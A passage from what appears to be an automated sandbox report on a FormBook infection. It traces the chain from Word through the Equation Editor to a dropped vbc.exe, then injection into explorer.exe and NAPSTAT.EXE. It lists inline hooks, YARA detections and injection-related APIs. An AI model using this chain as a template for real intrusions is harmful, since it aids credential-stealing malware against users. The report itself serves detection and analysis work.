61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 2c 20 74 69 6e 79 2c 20 75 72 6c 2c 20 63 6f 6d 70 72 65 73 73 2c 20 6c 69 6e 6b 2c 20 62 69 74 6c 79 2c 20 73 68 61 72 65 2c 20 73 68 6f 72 74 65 6e 2c 20 73 61 76 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 6c 63 6f 6d 65 20 74 6f 20 58 59 32 2e 65 75 20 2d 20 44 6f 20 79 6f 75 20 68 61 76 65 20 65 6e 6f 75 67 68 20 6f 66 20 70 6f 73 74 69 6e 67 20 55 52 4c 73 20 69 6e 20 65 6d 61 69 6c 73 20 6f 6e 6c 79 20 74 6f 20 68 61 76 65 20 69 74 20 62 72 65 61 6b 20 77 68 65 6e 20 73 65 6e 74 20 63 61 75 73 69 6e 67 20 74 68 65 20 Data Ascii: 1FC3<!DOCTYPE html ><head><script async data-ad-client="ca-pub-2614556310778759" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script> (adsbygoogle = window.adsbygoogle \|\| []).push({ google_ad_client: "ca-pub-2614556310778759", enable_page_level_ads: true });</script> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-36872558-7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-36872558-7'); </script> <meta charset="UTF-8"> <meta name="robots" content="index, follow"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="keywords" content="short, tiny, url, compress, link, bitly, share, shorten, save"> <meta name="description" content="Welcome to XY2.eu - Do you have enough of posting URLs in emails only to have it break when sent causing the
Jun 11, 2021 16:00:12.184077978 CEST	1057	IN	Data Raw: 72 65 63 69 70 69 65 6e 74 20 74 6f 20 68 61 76 65 20 74 6f 20 63 75 74 20 61 6e 64 20 70 61 73 74 65 20 69 74 20 62 61 63 6b 20 74 6f 67 65 74 68 65 72 3f 20 57 65 20 77 69 6c 6c 20 63 72 65 61 74 65 20 61 20 74 69 6e 79 20 55 52 4c 20 74 68 61 Data Ascii: recipient to have to cut and paste it back together? We will create a tiny URL that will not break in email postings and never expires. Our site is also mobile friendly!"> <meta name="viewport" content="width=device-width, initial-scale=1">
Jun 11, 2021 16:00:12.184132099 CEST	1058	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 67 66 78 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d Data Ascii: <link rel="shortcut icon" href="/gfx/favicon.png"> <link rel="stylesheet" href="/css/style.css"> <link href="https://fonts.googleapis.com/css?family=Courgette%7CAcme%7CMontserrat&subset=latin-ext" rel="stylesheet"> ... Counter
Jun 11, 2021 16:00:12.184184074 CEST	1059	IN	Data Raw: 2f 2f 74 69 6e 79 75 72 6c 2e 6d 6f 62 69 22 3e 54 69 6e 79 55 52 4c 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 68 6f 72 74 2d 77 72 61 70 70 65 72 2d 62 61 63 6b 67 72 6f 75 6e Data Ascii: //tinyurl.mobi">TinyURL</a></div></div><div class="short-wrapper-background" style="text-align: center"><div class="short-wrapper"><div class="container" style="background-color: transparent; padding-top: 60px; padding-bottom: 60px
Jun 11, 2021 16:00:12.184237957 CEST	1061	IN	Data Raw: 58 59 32 2e 65 75 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a Data Ascii: XY2.eu</b></div><div style="padding-bottom: 15px; font-style: italic; font-size: 14px" class="text">*No PayPal account required</div><form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"><input type="hidden" na
Jun 11, 2021 16:00:12.184349060 CEST	1062	IN	Data Raw: 20 79 6f 75 72 20 6c 69 6e 6b 73 20 74 6f 6f 6c 62 61 72 2e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 22 3e 3c 62 3e 3c 61 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 Data Ascii: your links toolbar.</div><div style="padding: 10px;"><b><a style="font-size: 22px;" href="javascript:void(location.href='http://xy2.eu/create.php?url='+encodeURIComponent(location.href))">XY2.eu</a></b></div><div class="text">By clicking
Jun 11, 2021 16:00:12.184412003 CEST	1063	IN	Data Raw: 20 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 61 70 70 73 2f 64 65 74 61 69 6c 73 3f 69 Data Ascii: </b></div><a target="_blank" href="https://play.google.com/store/apps/details?id=com.myportal.URLShortener"><img src="/gfx/qr-app.png" alt="Scan this QR code with your mobile device"/></a></div>...<div class="container" style="text-a

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE3
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE3
GetMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE3
GetMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE3

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2512 Parent PID: 584

General

Start time:	15:58:30
Start date:	11/06/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f340000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2888 Parent PID: 584

General

Start time:	15:59:20
Start date:	11/06/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2296 Parent PID: 2888

General

Start time:	15:59:23
Start date:	11/06/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x1f0000
File size:	939008 bytes
MD5 hash:	616A10FDC3307FD483916E1B578C9F9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 3040 Parent PID: 2296

General

Start time:	15:59:25
Start date:	11/06/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x1f0000
File size:	939008 bytes
MD5 hash:	616A10FDC3307FD483916E1B578C9F9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 3040

General

Start time:	15:59:27
Start date:	11/06/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: NAPSTAT.EXE PID: 2244 Parent PID: 1388

General

Start time:	15:59:42
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\NAPSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NAPSTAT.EXE
Imagebase:	0x920000
File size:	279552 bytes
MD5 hash:	4AF92E1821D96E4178732FC04D8FD69C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2236 Parent PID: 2244

General

Start time:	15:59:46
Start date:	11/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x49d20000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2296 Parent PID: 2888 vbc.exeCOMMON

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.4%
Total number of Nodes:	106
Total number of Limit Nodes:	8

Executed Functions

Function 04316260, Relevance: 1.6, APIs: 1, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 04316357

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c55bdd33f28b97dffe5a3b9d43e63dff91f3264424e150a4b0333e5326d05fc2
Instruction ID: 0375d28b272ca3d826e4eec6405807c432c97a58ca279dfa17bbd26905ec4c30
Opcode Fuzzy Hash: c55bdd33f28b97dffe5a3b9d43e63dff91f3264424e150a4b0333e5326d05fc2
Instruction Fuzzy Hash: 1641E0B5D04258DFCB24CFA9D885AEEBBF0FF49314F14842AE845A7220D7356946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BDAD58, Relevance: 1.6, Strings: 1, Instructions: 302
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e@, xrefs: 00BDAFA8

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID: e@
API String ID: 0-4048461213
Opcode ID: 183bd35f6cf5be7d8b50cc9e2923abb556f3268e70196784a2a4f2f7c3ca1ae1
Instruction ID: e0fdd6415d500f46efd0f972aeb5e6fd9fc70d8f60fb1f83803ac4600cd64254
Opcode Fuzzy Hash: 183bd35f6cf5be7d8b50cc9e2923abb556f3268e70196784a2a4f2f7c3ca1ae1
Instruction Fuzzy Hash: A1D11874D0020ADFCB08CF95C5858AEFBB2FF88301F2495AAD516AB355E7349A42CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04313C00, Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

Tj*, xrefs: 04313F18

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID: Tj*
API String ID: 0-1080541752
Opcode ID: 656d4235160337740d5f1b0add1cca09e9200de0517457e590f7db52fd3f8d5b
Instruction ID: 340830deb1e4823c887080a7336bf01e25cd2ac5299551f9719b1df5888bad0e
Opcode Fuzzy Hash: 656d4235160337740d5f1b0add1cca09e9200de0517457e590f7db52fd3f8d5b
Instruction Fuzzy Hash: 59A128B0E056498FDB08CFE9C5845DEFBF6BF88310F14952AD809E7364E734A9418B64

Uniqueness

Uniqueness Score: -1.00%

Function 043138E0, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

|]A\, xrefs: 043139AB

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID: |]A\
API String ID: 0-4017495616
Opcode ID: 861e775a175b88bfe60da2a23b2d55edbf9251a6d46db821086f1533348fb6de
Instruction ID: 17d09fc89c8e01f3371c32f0c7d9576755b7b9291250a653d23f4a667ae2f16b
Opcode Fuzzy Hash: 861e775a175b88bfe60da2a23b2d55edbf9251a6d46db821086f1533348fb6de
Instruction Fuzzy Hash: C5414770E042599FDB49CFB9C44159EBBF6EF8A300F1194AAC801BB660E7356902CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00BD8099, Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

, xrefs: 00BD811D

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID: 0-4114979577
Opcode ID: 0973b7713252f337ff2bfe84b2b312086230b99acea3d44cea9c0321943f75ad
Instruction ID: 0ed8b2673f410d54883b67dc217d22fb92c1b9f9251a118407a06db56602782d
Opcode Fuzzy Hash: 0973b7713252f337ff2bfe84b2b312086230b99acea3d44cea9c0321943f75ad
Instruction Fuzzy Hash: 8B31F5B0E056188FEB58CF6BDC54A9EFBF7AFC8204F04C5AAD508A7264EB3019458F51

Uniqueness

Uniqueness Score: -1.00%

Function 00BD7CE2, Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e13828115b0efb7d9872c4240b966fa2f071a5f885a71f656ddc7d64d9c437
Instruction ID: 667c3e5e5df6a71c4f1e9ab7ca3b17c68f607360d8bbf35cd4ec58ba5bcb7ee0
Opcode Fuzzy Hash: 84e13828115b0efb7d9872c4240b966fa2f071a5f885a71f656ddc7d64d9c437
Instruction Fuzzy Hash: 1971221184F3D81EDB03A77829B46C63FB86E53159B4E04C7C0D1CF5A3EA284A8CD3A6

Uniqueness

Uniqueness Score: -1.00%

Function 00BD6250, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa2b7635d0c1d19e8dbeac3cccf419a31609da43e93b76a0d1ee911a7c4e536
Instruction ID: c1f7465dbd495b626cb9263c34ababf1cd6c39ef52b63116dbce8bf1c75a402b
Opcode Fuzzy Hash: bfa2b7635d0c1d19e8dbeac3cccf419a31609da43e93b76a0d1ee911a7c4e536
Instruction Fuzzy Hash: 08A11470E00218CBDF24DFA9C8847DEFBF2AF99318F6085AAD508A7345EB7459858F50

Uniqueness

Uniqueness Score: -1.00%

Function 00BD8BD9, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed249941ac3a7301daa5c26df1af7139b4f2bdbf006de93933bf56974d8f884
Instruction ID: 9a3f35d72e0a03669b9aeea022fab793ab755aa072e5eca0facdfc905ce6174b
Opcode Fuzzy Hash: 1ed249941ac3a7301daa5c26df1af7139b4f2bdbf006de93933bf56974d8f884
Instruction Fuzzy Hash: E4B15674E052588FCB04CFA9C894ADDFFF2BF9A301F24856AD405AB3A5EB345806CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0431828F, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04211dd73cf80a27ca664cd2177c5b8f3941d5ddbcffc08f916d203fce86c9b8
Instruction ID: f005947be53d65d2c3086bb2072d280e4925e2e320f1a282f20dab905e8967bc
Opcode Fuzzy Hash: 04211dd73cf80a27ca664cd2177c5b8f3941d5ddbcffc08f916d203fce86c9b8
Instruction Fuzzy Hash: D5A15C75E04619CBDB28CF66CC44BDDB7B6AF89300F14E5EAD409A7260EB746A81CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00BD6240, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d915913ed12ce6a8560df68b32398fe42f5031774a779143b41edc251f38053f
Instruction ID: 1ddb19f1a4013820576eb436d91c7e9f38e5e9c0ccba457e5c9caba902263093
Opcode Fuzzy Hash: d915913ed12ce6a8560df68b32398fe42f5031774a779143b41edc251f38053f
Instruction Fuzzy Hash: 2F912470E00218CFDB24CFA9C8807DEFBF2AF99314F6085AAD508A7355EB3459858F51

Uniqueness

Uniqueness Score: -1.00%

Function 00BD8C80, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6dc8d36f4950b031336eb8af6adec8f09e46fd00f7d0ccf841f50ef3e1176f
Instruction ID: f179d59f28d67d6820a38518329ef354ee66c6007bda4eaf3edeea6407bf2deb
Opcode Fuzzy Hash: 7d6dc8d36f4950b031336eb8af6adec8f09e46fd00f7d0ccf841f50ef3e1176f
Instruction Fuzzy Hash: DE81D674E012198FDB04CFAAC984A9EFBF2FF89301F24856AD519AB364DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BD94E0, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2df7d09d185b8450ac5d618ae9be331ee875c91f7a84861d36427476e6c3b82
Instruction ID: 8d5e500176cfecd70444767f5097f730a2d23347a8a324c4efe564a028f8bb43
Opcode Fuzzy Hash: d2df7d09d185b8450ac5d618ae9be331ee875c91f7a84861d36427476e6c3b82
Instruction Fuzzy Hash: D45128B0E052099FDB09CFA9D9805EEFBF2EF89304F24956AD419A7355E3348941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BD9EF9, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2184945599.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6895ce4aec4bc78b23e6f4fe935db6e5a7ff246a91bca266d6a546723c71a8a1
Instruction ID: 70075bd13c932375f4e8dda0dbdbede58e72caad8323beeecda797bbbd8d3472
Opcode Fuzzy Hash: 6895ce4aec4bc78b23e6f4fe935db6e5a7ff246a91bca266d6a546723c71a8a1
Instruction Fuzzy Hash: 23310571E016088FDB18CFAACD546DEFBF7AFC9300F14C1AAD409A6264EB341945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0431688D, Relevance: 1.8, APIs: 1, Instructions: 329
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04316B5F

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 46a719d8041e5696c463c855540003e3178c2cb8a03a17c5668cc8e16471a4c7
Instruction ID: 25145bbe103420696f49e75676131327c777965148dd57680e22f9d35a764b8d
Opcode Fuzzy Hash: 46a719d8041e5696c463c855540003e3178c2cb8a03a17c5668cc8e16471a4c7
Instruction Fuzzy Hash: 17C12470D0022D8FDB24CFA4C841BEEBBB5BF49308F1095A9E859B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04316898, Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04316B5F

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4310000_vbc.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cc0788b63408028b1317d2b2459a002016a5620c78c45b6a0e86194a4cc70d86
Instruction ID: 138a69293ec484dbf560301973e34f0cf870020ae24e02fe60aa279b252ea329
Opcode Fuzzy Hash: cc0788b63408028b1317d2b2459a002016a5620c78c45b6a0e86194a4cc70d86
Instruction Fuzzy Hash: 20C12470D0022D8FDB24CFA4C841BEDBBB5BF49308F10A5A9D859B7250DB74AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 043164F8, Relevance: 1.6, APIs: 1, Instructions: 123
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 043165D3

Memory Dump Source

Source File: 00000005.00000002.2185767774.0000000004310000.00000040.00000001.sdmp, Offset: 04310000, based on PE: false

Joe Sandbox IDA Plugin

